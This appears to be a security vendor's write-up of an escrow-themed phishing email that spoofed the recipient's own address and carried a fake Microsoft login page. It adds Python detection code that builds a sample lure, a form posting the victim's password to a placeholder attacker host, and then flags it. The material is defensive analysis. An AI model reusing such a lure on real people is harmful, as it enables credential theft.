Executive Targeted in a Self-Addressed Escrow-Themed Credential Phishing Attack
In this attack, a company executive was asked to review a supposed escrow letter and fully executed contract for an apparent real estate transaction, attached to the email. The email opens with the salutation “Dear All”, potentially used to make it appear as if the email was sent to multiple recipients. The sending email address was spoofed to be identical to the recipient’s address and, rather than including a sender’s name, the display name also matched the recipient’s email address. The filename of the attached HTML file started with “Completion statement” and ended with a reference to the recipient’s company.
Upon opening the attachment, the target would have been presented with a phishing page mimicking a Microsoft login page, with the recipient’s email address already pre-populated, under the pretext that they needed to authenticate their identity to view the documents.
Why It Bypassed Traditional Security
Traditional tools that rely on known bad indicators cannot detect the URL in the attachment because it had not been seen before and so appears on no blocklist. The spoofed domain did not have an effective DMARC policy in place to reject unauthorized senders attempting to send emails from an address on the domain.
Detecting the Attack
HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious. The sending and receiving email addresses in this email appeared to be identical, which is an indicator that this message is potentially malicious. A holistic detection system that is able to extract and analyze URLs from email attachments is required to assess the intent of any links, alongside other signals acquired through content analysis, to determine whether the email is malicious.
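The signals described in this section and the missing DMARC policy noted above can be checked programmatically. The following is an added example, not code from the original report: it builds a constructed message mirroring the attack (self-addressed From, an HTML attachment with a pre-filled login form), extracts the indicators from the raw message, and parses a DMARC record's p= tag. The addresses, filename and URL (victim.example, phish.example) are invented placeholders.

```python
import re
from email import message_from_bytes, policy, utils
from email.message import EmailMessage

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

def build_sample() -> bytes:
    # Constructed sample mirroring the report: self-addressed From whose display
    # name is the address, and an HTML attachment whose login form pre-fills
    # the recipient's address and posts to an external URL (all placeholders).
    html = ('<form method="post" action="https://phish.example/collect">'
            '<input name="login" value="exec@victim.example">'
            '<input type="password" name="passwd"></form>')
    msg = EmailMessage()
    msg["From"] = '"exec@victim.example" <exec@victim.example>'
    msg["To"] = "exec@victim.example"
    msg["Subject"] = "Escrow letter and fully executed contract"
    msg.set_content("Dear All,\n\nPlease review the attached completion statement.\n")
    msg.add_attachment(html, subtype="html",
                       filename="Completion statement - Victim Corp.html")
    return msg.as_bytes()

def analyze(raw: bytes) -> dict:
    # Signals from the report: sender == recipient, HTML attachments, URLs
    # inside them, and the recipient's address pre-filled in the attachment.
    msg = message_from_bytes(raw, policy=policy.default)
    sender = utils.parseaddr(str(msg["From"]))[1].lower()
    to_hdrs = [str(h) for h in msg.get_all("To", [])]
    recipients = [a.lower() for _, a in utils.getaddresses(to_hdrs)]
    findings = {"self_addressed": bool(sender) and sender in recipients,
                "html_attachments": [], "urls": [], "prefills_recipient": False}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. application/octet-stream with an .html name
            body = body.decode("utf-8", "replace")
        findings["html_attachments"].append(name)
        findings["urls"].extend(URL_RE.findall(body))
        findings["prefills_recipient"] |= bool(sender) and sender in body.lower()
    findings["suspicious"] = findings["self_addressed"] and bool(findings["urls"])
    return findings

def dmarc_policy(record: str) -> str:
    # p= tag of a DMARC TXT record ('none' when absent); only 'reject' refuses
    # unauthorized senders spoofing the domain, which the report notes was missing.
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    return tags.get("p", "none").strip().lower()
```

In production the extracted URLs would be passed on to reputation and content analysis rather than used as a verdict on their own, and the DMARC record would be fetched from the _dmarc TXT record of the sending domain.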
Risk to Organization
When an employee enters their credentials, attackers gain access to their email account, which they can use to search for sensitive information or launch attacks on coworkers, customers, and vendors.